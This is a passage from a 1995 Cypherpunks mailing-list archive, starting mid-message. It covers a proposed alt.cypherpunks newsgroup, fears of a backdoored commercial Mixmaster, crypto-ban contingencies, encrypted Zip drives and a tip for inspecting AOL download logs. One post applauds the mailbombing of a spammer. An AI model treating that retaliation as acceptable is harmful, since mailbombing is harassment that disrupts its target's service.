ignoring.  My fingers are tired and I believe them incidental.

> 
> David C. Lambert
> dcl@panix.com
> (finger for PGP public key)
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7
> XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0
> FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX
> qO/kxlVRRZg=
> =1Lxr
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 16 Sep 95 09:57:15 PDT
To: cypherpunks@toad.com
Subject: alt.cypherpunks
Message-ID: <199509161706.MAA03037@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

My vote is to let the folks on usenet sink in their own quagmire of
ignorance about what we do. This list is no secret. If somebody wants to
get into the 'game' let them bloody well subscribe. 

Ta ta.

                                          Jim Choate
                                          CyberTects
                                          ravage@einstein.ssz.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "syrinx@c2.org (Syrinx Anonymous Remailer)" <syrinx@c2.org>
Date: Sat, 16 Sep 95 12:30:08 PDT
To: jpunix.com.remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
Message-ID: <199509161921.MAA05294@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


nelson@crynwr.com (Russell Nelson) wrote:

> There *will* always be a free version of the client with source
> code, but the proprietary improvements will probably not be merged
> into the free version.  Lance, and only Lance, as copyright holder,
> has the publish the code under a different copyright.  It's the same
> thing that Phil Z. did with ViacryptPGP.

It's not the same thing, though.  PGP 2.6.2 and PGP 2.7 are
compatible.  You can compile 2.6.2 from the sources and have it
interoperate with Viacrypt 2.7.

The concern is not "commercialization", per se, but rather the use
of "commercialization" as an excuse to build in "proprietary"
features (Back doors?) for which no corresponding source code is
involved.

Since no one has made a good case for there even being a COMMERCIAL
market for Mixmaster, could there be other motives?  Without
building an anonymous e-$ infrastructure first, there's no way to
even charge for the use of a remailing service without sacrificing
anonymity, even if people were willing to pay to have messages
anonymously remailed.

No, I'm not accusing Lance.  But if he no longer has the time to
support Mixmaster, then perhaps some other crypto-friendly group
should take over the task and keep it an OPEN system, with source
code available.  In fact, even freezing Mixmaster as is would be
preferable to "improvements" that people don't/can't trust.

True, they *COULD* provide source code, but how many commerical
products come with complete source code?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:31:09 PDT
To: Peter Trei <trei@process.com>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <9509151915.AA16093@toad.com>
Message-ID: <Pine.SUN.3.91.950916122624.25537D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 15 Sep 1995, Peter Trei wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
>      Think about it. Which future would you rather see:
> 
> 1. Lots of people demanding strong unescrowed crypto for what you  
>    consider rather peripheral and politically unaware reasons, which
>    you have educated them in.
> 
> 2. Unescrowed crypto banned, with those who promote considered
>    aiders and abeters of the four horsemen, (but boy are they 
>    ideologically pure!).


3. Unescrowed crypto banned, with advanced stego, panic passwords, 
stealth PGP, incorporated remailers all across international borders 
making offenders impossible to identify or catch.

Given the degree to which I believe 1. unlikely in the numbers required 
to avoid the unescrowed encryption ban, I believe the goal is to 
propogate crypto far enough to at least have a salient "underground" 
participants.

Some months ago I called for advanced stego and stealth PGP as well as 
larger keys in the event we all had to go "into the crypto closet" for a 
time.

I call for them again.

> 
> Peter Trei
> 
> I probably won't see any responses till Monday. I'm going for a 
> weekend at a resort on Lake Winnipesaukee. If you need me, I'll be
> in the hot tub. :-) 
> 
>      
> 
> 
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMFmmK1QxhKXe9s8VAQE+tgP+NcKdGvBeJpa8AHGr/RhKCHudZP2qmRNP
> J699UCCvN006ywIjurjuis48VPj26uxBkcRbeuzNxGlKmZqXIkS0vEcFjrrZhBsK
> V9dLFFGTZ6JG3nK++mleW1wQB/F0azXXvXKJWa6R+Tnj1oo2ADUxGNQMs9IVmgR3
> zsyK3fej+IQ=
> =YqDH
> -----END PGP SIGNATURE-----
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:35:48 PDT
To: John Hemming CEO MarketNet <JohnHemming@mkn.co.uk>
Subject: Re: More on ECheques
In-Reply-To: <v02120d00ac805e5cf474@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.950916123607.25537G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, John Hemming CEO MarketNet wrote:

> 1. I was not suggesting that you put your real bank account number
>     in the program.  A test number is perfectly adequate.
> 
> 2. In the UK people advertise their Bank Account numbers so that people
>     can pay them.
> 
> 3. If you do use your real bank account number,  I will not pay you
>     anything nonetheless.

(But I will clone some checks and drain your account quickly).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 16 Sep 95 09:39:41 PDT
To: Dar Scott <dsc@swcp.com>
Subject: Re: (Noise) X-Files anarchist
In-Reply-To: <v01510100ac80a19afbbc@[198.59.115.139]>
Message-ID: <Pine.SUN.3.91.950916123927.25537I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 16 Sep 1995, Dar Scott wrote:

> I hardly watch TV ...blah, blah..., but I saw X-files last night.  A very
> minor character was a cryptohacker who--to his surprise--brute-forced a
> military key for some files.  He was described as an anarchist.
> 
> To _my_ surprise, this anarchist was not associated with violence or
> lunatic ravings.  He was shown as reading a book entitled something like
> Survey of Modern Conspiracy Theories.

"50 Greatest Conspiracies"

But I never watch T.V.

> 
> I think the character was killed, but I may have missed something.
> 
> Dar
> 
> ===========================================================
> Dar Scott               Home phone: +1 505 299 9497
> 
> Dar Scott Consulting         Voice: +1 505 299 5790
> 8637 Horacio Place NE        Email: darscott@aol.com
> Albuquerque, NM  87111              dsc@swcp.com
>                                Fax: +1 505 898 6525
> http://www.swcp.com/~correspo/DSC/DarScott.html
> ===========================================================
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 16 Sep 95 13:16:49 PDT
To: cypherpunks@toad.com
Subject: C-punks, marketing for the masses
Message-ID: <199509162008.AA03860@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

No disrespect intended, but I think that the various "let's sanitize
the Cypherpunk message for mass acceptance" marketing/soundbite 
proposals are pointless. Cypherpunks is a mailing list, not a political
party (or a platform). 

- From my perspective, the organizing meme for the list is not "strong
crypto is really important, so let's write some and lobby our lawmakers
to make sure it stays legal" but "strong crypto is here and is changing
the dynamics of force, politics, and power, so let's see what we can 
do with it."

(And no, I don't think it's important to spread that "meme" (a term
I use with some trepidation) around to get "market share" for it.
Ideas are not football teams nor initiative proposals.)

I appreciate and support and have participated in various write-yer-
legislator activities. They're useful short-term. But if Tim May and
Duncan Frissell and the other list members who've dared to make predictions
about the impact of crypto on government and economics are correct,
what the government and the legislators want doesn't matter. If they're
wrong, what we want doesn't matter. 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFsujH3YhjZY3fMNAQHfogP9HMEe6/N7B0q4cov8knythwuqha4yFmsR
Yfxtp8/ukXhfJlJQ5Mb40AYWcNwWGXmzd8J2KzrYBntKN60SZnd/StRQfHs6rtre
hLHZGss4bR1c9w0+Jsr3TKD5UQe2up2cEuY9u6qN6QyVK9h9QtfSHpJqb3bAZlla
fA3GMtB2qlc=
=Phdj
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 16 Sep 95 13:13:45 PDT
To: cypherpunks@toad.com
Subject: Re: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <199509162013.NAA06723@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:33 AM 9/16/95 PDT, you wrote:

>I'm sorry to report that SecureDrive does not support the Iomega ZIP
>drive.  I believe that's because the TSR driver supplied with the
>hardware does not support a DiskBIOS interface.
>
>I had thought that Secure Device, another real-time encryption system,
>would support this drive, since it works through a device driver
>mapped to a dos file.  But an actual trial proved otherwise.  The
>problem is that the DOS file must be present when the CONFIG.SYS
>DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
>driver is a TSR that doesn't get loaded until after all DEVICE
>statements have been processed.  There's no particular reason that
>Iomega couldn't have written their driver as an MSDOS device driver
>rather than a TSR, in which case SecureDevice would probably work, but
>they didn't, so it doesn't.

There is a Win95 driver for the Zip drive that does not a TSR.  It is a
parallel to SCSI driver that is added through the "add hardware" control
panel.  I am not certain as to the order that the drivers load.  I will have
to test it.  (The driver was released on the 9th of this month with little
or no instructions.)

Having encrypted Zip drives would be VERY useful.  I will see if Borland's
latest update for the C++ compiler has any additional information as to some
of the driver interface issues (I doubt it, but it is worth a try).  It is
supposed to arrive "any day now", but it is backordered so who knows when I
will get it.
I may have to spend the bucks and get the Microsoft development disc
subscription again.  It will most likely have the information needed to
convert the drivers to something Win95 will understand.

|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sat, 16 Sep 95 13:17:59 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <199509162015.AA03916@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn writes:
> Some months ago I called for advanced stego and stealth PGP as well as 
> larger keys in the event we all had to go "into the crypto closet" for a 
> time.

> I call for them again.

I know of three ways to get software:

1. Write it yourself.
2. Pay someone else to write it.
3. Find software someone else wrote that meets your needs.

If (3) isn't working, perhaps you should try (1) or (2). 

(I've been "calling for" a big house with a hot tub for years now.
Still no progress. I'll let you know if it works out.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFswPX3YhjZY3fMNAQHatwP/ZJKuNEDRPdCldyvshGkG/w/io+37zx3m
DyJ4h1+OicxYCtKbolXYVcX8C4d1j7hXY2sesepcDvYYyy+butdQ+/2tw3u0FW1j
WpfCGURpypBVb5T7QlL21Qv39cBIu9mJxkasPkQSeSnrC24eGtoItmZzrIRZgJyj
Dj2FOIfxiFY=
=5DwJ
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 16 Sep 95 10:34:22 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <ac8044c413021004e871@[205.199.118.202]>
Message-ID: <9509161733.AA03680@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Should there be an "alt.cypherpunks" type of newsgroup instead of this
>mailing list?

Bad idea, it would simply mean that every kook on USEnet would add 
alt.cypherpunks onto the crossposting line. We would have black helicopters, gun 
loons, Waco Wako's, Loonytarians and turkish government propaganda spamming 
forever.

I think we should wait a while. I see USEnet going through some very dramatic 
changes quite soon, the infrastructure of newsgroups is now insufficient to 
support the cognitive complexity of discorse amongst so many people. I expect 
more structures discorse models such as the lightweight link semantics of 
Openmeeting and Wit to percolate in, NCSA already have a version of hypernews 
with these features.

One thought to ponder on. There is no real difference in terms of resources 
required between a mailing list and an archive of a mailing list at a Web site. 
The latter does avoid a large number of unnecessary dispatches however.

	Phill


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 16 Sep 95 13:41:36 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks as a newsgroup
Message-ID: <199509162041.NAA10780@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:40 PM 9/16/95 -0400, Ian wrote:

>I've been very impressed with the signal/noise ratio on this list.
>In fact, people often put [NOISE] in the subject line to flag trivial
>content.  This ratio will certainly go down if we go to a newsgroup.

I have a group of friends who get forwarded the "best" of the Cypherpunks
list.  The signal to noise ratio is high enough that I have to be careful
how much I forward lest I get complaints at the volume of what I forward.
Turning this into an alt group would destroy that.

>One of the main benefits of Usenet is that anyone can _post_.
>One of the main detriments is that _anyone_ can post.

How true.
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 16 Sep 95 13:58:21 PDT
To: cypherpunks@toad.com
Subject: AOL monitoring
Message-ID: <199509162055.NAA22204@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


hello, apparently the recent FBI sting happened with the cooperation
of AOL, which allowed the FBI to monitor downloads..

here's some info to test if you are being monitored on AOL

------- Forwarded Message

Date: Sat, 16 Sep 1995 14:47:38 -0400
To: snet-l@world.std.com
From: Charles Zeps <czeps@icis.on.ca>
Subject: How to find out if you are sniffed at AOL  


>      America Online Opens Private E-mail to Federal Sting
>              (c) 1995 N.Y. Times News Service
>
>(14 Sept. 1995 )  Responding to court orders related to a
>nationwide crackdown on the electronic transmission of child pornography,
>America  Online, the nation's largest information service, gave law
>enforcement agents access to the private electronic mailboxes of an unknown
>number of its subscribers, company officials confirmed Thursday.

From: Eric Muetterties <ericm3@ix.netcom.com>

   All you America online users would be wise to check out your
software...(WINDOWS)

    Use a file viewer that will allow you to view in hexadecimal.Or use
the DOSSHELL.EXE program in your DOS directory and use the menu to VIEW
file contents
    
    Find your Aonline directory and find the directory marked IDB.

    This should have two files marked with your screen name and a
suffix of either .arh or .pnd  (eg.  ericmuette.arh)

    With the file loaded in the viewer you will see the hex dump of
these files. In the side pane will be the equivalent ascII of the
hexadecimal dump (in laymans terms... if there is text you will
recognize it...)

    Use PAGE DOWN to move down through the files.... soon you will
recognize the first files you downloaded and references to where you
were on the internet and what directory you saved the file to.

    Make these files READ ONLY with the file attributes menu in your
file manager and they can not use this facility../

    You will get an error message when you first start up ("XFER ERROR
- - - could not create database") Click on "OK" and program will continue.

    Then when program gives you messages when you try to save to disk
or download something just click on "IGNORE" till program continues
(usually 3 times).

    When they realize everyone is defeating this they can easily come
up with a more covert way of tracking you but in the meantime...
    ... better to change to another provider...

    You will be amazed at your freinds expressions when you get on
their computer and tell them what they have downloaded.

    If you view the files in the TOOLS directory , at the end of the
files you will find the internal names for these programs such as
"Internal DAtabase" , ETC.  !!!  Have fun...

    Big Bro is here in a BIG WAY... MIND YOUR P's and Q's on the NET
!!!

    E. Muetterties

    If you can't figure out how to do this email me with what is in
your "IDB" directory and I'll tell you which files to view.

    ericm3@ix.netcom.com


Linda Thompson
American Justice Federation
Home of AEN News and "Waco, the Big Lie" "America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN  46203
Telephone:  (317) 780-5200
Fax:  (317) 780-5209
Internet:  lindat@iquest.net

"When even one American -- who has done nothing wrong -- is forced by fear
to shut his mind and close his mouth, then all Americans are in peril."
Harry Truman








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Sat, 16 Sep 95 11:01:54 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <v0153050aac80bc08da47@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:33 PM 9/16/95, hallam@w3.org wrote:
>>Should there be an "alt.cypherpunks" type of newsgroup instead of this
>>mailing list?
>
>Bad idea, it would simply mean that every kook on USEnet would add
>alt.cypherpunks onto the crossposting line. We would have black
>helicopters, gun
>loons, Waco Wako's, Loonytarians and turkish government propaganda spamming
>forever.

A lot of people on the list seem to see it as a corporation that has to
show X% growth for its shareholders every year.

The list is a healthy size, and there are a lot of very bright people on it
with very good ideas (a lot of the best people and best ideas in the field,
in fact).  Traffic is pretty high, too.  I don't see any reason to try to
increase our market share just for the sake of it.

Even worse, it seems to me that what some people are suggesting (and this
comes up at least once a year) will lead to increased entropy, with us, the
EFF, EPIC, etc., etc., blending into one amorphous lobbying blob.  This is
a unique list of people doing VERY IMPORTANT work that no one else is
doing.  To tell you the truth, I think that to date cypherpunks have left a
much greater mark on the world than the EFF and all of the others.  No
question about it.

Again (as others have said over and over), if people are concerned about
better lobbying, this isn't the place for it--and the good news for you is
that there are plenty of other groups with the resources, staff, and
mission to do it.  So what's the problem?

If you're embarrassed mentioning our name to your straight friends, c'est
la vie.  I wish I could show my boss my brilliant article in the new issue
of ANARCHY, but I can't.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 16 Sep 95 14:25:54 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Re: SecureDrive News - Win95 yes, Iomega zip drive no
Message-ID: <199509162125.OAA17362@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:56 PM 9/16/95 -0400, darky wrote:

>	Have you tried an 'INSTALL=' line in the CONFIG.SYS to load
>the drive's TSR first?  INSTALL is a rarely-documented feature for the
>CONFIG.SYS to load a TSR during its processing.  I believe it also
>saves memory by not loading some sort of header to into memory (DOS
>PSP maybe?), which may also cause a problem.  Can't hurt to try
>though, eh?

After thinking about this (and drinking more coffee) I realized that he is
loading the GUEST.EXE driver.  This is not the best way to get the Zip drive
to work.  (It is meant as a temporary fix.)  There is actually a set of
drivers that can be installed in the config.sys file.  (Check the
documentation for installing the ASPI drivers and install the PPA3 driver as
the first of the three.)  This is poorly documented by Iomega, but it works.


|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 16 Sep 95 11:29:28 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <ac8044c413021004e871@[205.199.118.202]>
Message-ID: <Pine.PMDF.3.91.950916142734.539071276B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


newsgroups get more spam.  I'm getting ads from "janet.dove" for magazines
via this list as it is...something to do with a gateway to a newsgroup I
fear.  If it's a newsgroup, I'll probably read it less. " Life is too
short for spam when you can have a Pommard." 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 16 Sep 95 12:30:17 PDT
To: cypherpunks@toad.com
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
Message-ID: <9509161930.AA08524@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Although Tim is quite happy with Eudora's (or whatever it is)
email handeling techniques, I would also prefer a way in
which to use my Usenet tools on the cypherpunks list.

BUT

I think that making it a newgroup opens up the volume to
a level far beyond what it is now.  It will also result
in a far larger level of "noise" due mostly to cross-posts.

My plan is to gate cypherpunks to a local newsgroup
(local to my machine only) and read it that way.  Is 
it more work for me that way? - yes, but I'ld prefer to 
do the extra work required than loose what this group
has as a mailing list.

Now - if someone wants to start a seperate alt.cypherpunks
group, but *NOT* gateway this list to it - be my guest.
People can then vote with their feet which is the better
"medium" or transport method.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Sat, 16 Sep 95 12:47:13 PDT
To: cypherpunks@toad.com
Subject: Re: alt.cypherpunks
Message-ID: <v01510100ac80e603415c@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Hi all,
>
>My vote is to let the folks on usenet sink in their own quagmire of
>ignorance about what we do. This list is no secret. If somebody wants to
>get into the 'game' let them bloody well subscribe.
>
>Ta ta.

I should mention that the literate programming mailing list somehow died
when it moved to comp.programming.literate. Something about the nature of
usenet took the life out of it.

Besides, does anyone want the inevitable "How can I get my Win95 PC to run
doom?" questions?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFs3bHIf3YegbdiBAQEu7AJWLFim1gdvzCy1+WpPzr8lxcDMmYcxIOyH
3XqR+7YSfEoPEW23Gq73BBU658leNKspGwJQ1a+7qnFsDRL1+TEe/V4meOwfyoWq
aNcn
=YLv5
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "syrinx@c2.org (Syrinx Anonymous Remailer)" <syrinx@c2.org>
Date: Sat, 16 Sep 95 15:11:20 PDT
To: jpunix.com.remailer-operators@c2.org
Subject: RE: Commercial Mixmaster
Message-ID: <199509162201.PAA14969@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@nntp.com> wrote:

> >No, I'm not accusing Lance.  But if he no longer has the time to
> >support Mixmaster, then perhaps some other crypto-friendly group
> >should take over the task and keep it an OPEN system, with source
> >code available.  In fact, even freezing Mixmaster as is would be
> >preferable to "improvements" that people don't/can't trust.
>
> This doesn't make sense.
>
> Someone wants to commercialize Mixmaster.  You don't know who it is,
> but you since you can't see how to make money doing this, you suspect
> their motives.  Yet on the other hand, you think they will be so
> successful that enough people will buy binary-only servers such that
> backdoors are a real threat, perhaps by forcing people to upgrade
> or otherwise breaking interoperability with the current free-source
> remailer network.
>
> You can't have it both ways.

Of course not, but it only has to *LOOK* that way.  What if, let's
say, that this new "commercial" venture offers their "new, improved"
version FREE for individual and non-profit use, much like Netscape
is now offered, while supposedly working on the "commercial"
development of the product.  Now you've got a free product in the
hands of end-users, plus it's compiled to support DOS, Win 3.1,
Win95, Mac platforms, etc., as well as the current Unix.  It doesn't
matter if a commercial market is EVER developed, just so long as you
provide a suitable "cover" motive for giving it away.  Of course,
source code is still not provided, since that would supposedly give
competitors (for this supposedly developing commercial market)
knowledge of the proprietary improvements.

The idea would be to take a standardized product and "steal" market
share from the various PGP-chaining schemes, while doing it in such
a way to provide a back door of participating TLAs. Mixmaster is a
superior product to the other schemes, but it suffers from lack of
user-friendliness and availability on commonly-used platforms.

Think about this:  if you were a TLA, can you think of a more
cost-effective solution for keeping tabs on the increasingly
THREATENING (to them) growth of anonymous e-mail?  IOW, invest a few
million to get a Trojan Horse crypto product into people's hands that
they THINK is secure, and thus trust.  Do you think they could use
brute force to crack large quantities of IDEA or 3DES encrypted
traffic for less money?  If they can't crack PGP, then get people to
switch to something they *THINK* is "more secure".

> But even if you could, there's a solution. :)  Download the source
> and start releasing "blender", a free-source anonymous remail system
> that is upwardly compatibly, *and based on* the current Mixmaster.

I think that's what I suggested, isn't it?  Hopefully it will be a
foreign (ITAR-exempt) individual or group.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Sat, 16 Sep 95 13:12:22 PDT
To: cypherpunks@toad.com
Subject: Re: WAS_tem (fwd)
Message-ID: <9509162012.AA29482@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Rev. Ben:
> 
> On Thu, 14 Sep 1995, James A. Donald wrote:
> 
> > If you draw a picture using paintbrush of an underage person engaging
> > in sexual conduct, you are in violation of this proposed legislation.
> 
> Doesn't that directly contradict the stated purpose of existing child 
[snip]
> 
> Do the lawyers on the list want to pipe up?

	On cypherpunks?!?  Whatever for?  I imagine there's already a
rousing discussion going on about this somewhere in AOL.  Take it there.

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sat, 16 Sep 95 15:04:33 PDT
To: cypherpunks@toad.com
Subject: All Online Lusers, cryptoTCP
Message-ID: <199509162112.PAA02177@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Well, I read the tip on how to find out if AOL is checking
what I download. The good news is, they're DEFINATELY NOT. ;)

Anybody have a link to the encrypted TCP driver? I remember
the original annoucement didn't give a link.

Don

"So what you're saying is, if too many people are breaking into my house,
I should leave the key under the doormat so the police can chase the
crooks???" 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMFs9VMLa+QKZS485AQFXuQL7Bd/u6MznUCYTMdKbIT4P+6IVj+j4IXjO
CL4kg2tGefOKq5RD543ThP4PQx1HghIU1dHTg5ZeF9c52JE0owNFuRa2GgfDld5s
SzZrlhmff0kqMdn6QyV4+mCICmiX9BnS
=NsVn
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 16 Sep 95 12:17:20 PDT
To: cypherpunks@toad.com
Subject: (noise) Re: SPAM bait
Message-ID: <199509161913.PAA55049@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


nobody@alpha.c2.org (Anonymous) wrote:

<snip>
>
>Don't worry, "Janet Dove", or actually sanghi3@grfn.org got mailbombed
>severely for this one.  I'm just glad he doesn't know how to use remailers.

Good going, Anonymous. What I don't understand about inappropriate
SPAMs like that one (or telephone ads) is; what's the business
incentive to do it? I assume that no Cypherpunk has subscribed to
"Janet's" magazines, and I know that no Ray has _EVER_ spent
money over a telephone unless we initiated the call, yet *still*
we get unwanted calls every once-in-a-while. WHY? [Please respond
privately to liberty@gate.net ]
JMR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sat, 16 Sep 95 12:22:24 PDT
To: cypherpunks@toad.com
Subject: "Hackers"-- brief review and anecdote...
Message-ID: <ac80d4a51e02100402b9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



I saw "Hackers" yesterday. It's not bad and its political sensibility is
very cyberpunk. The ad campaign even uses the tag line, "Their only crime
is curiosity." Given that a major studio is spending beaucoup bucks to
spread this tag line, I think it is safe to say that cyber issues are very
mainstream by now. Still edgy enough to be exciting to many, but definitely
comprehendable.

The characters are just a bit too cool for school and some of the notes
ring false. The evil one, a corporate computer security officer, would have
been better served by someone who is not as laughable as Fischer Stevens. I
could probably hit the escape key on my computer here and he would cringe.
Jeremy Irons or Klaus-Maria Brandaur would have been more inspired. But
they can't skateboard.

I also stopped by the Department of Motor Vehicles yesterday. The lines
were long and I soon found myself grousing along with the guy behind me. He
was about 60 years old and not part of the cyberpunk generation in any way.
After I said some libertarian thing by wondering aloud about why we even
needed to have such a huge bureaucracy centered around cars, he said,
"Yeah. Have you seen all the land they have down in Fort Meade. Beautiful
land and they just spend their time down their spying on the people." He
lumped the NSA in with the DMV. To him, it was just one big bureaucracy.

-Peter







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Sat, 16 Sep 95 13:42:18 PDT
To: cypherpunks@toad.com
Subject: Newbie Crypto question: MOD?
Message-ID: <Pine.SOL.3.91.950916153657.18178A-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain



Ok folks, I recently received "Applied Cryptography" as a gift, and just 
have one question: How does the MOD function work in crypto functions? It 
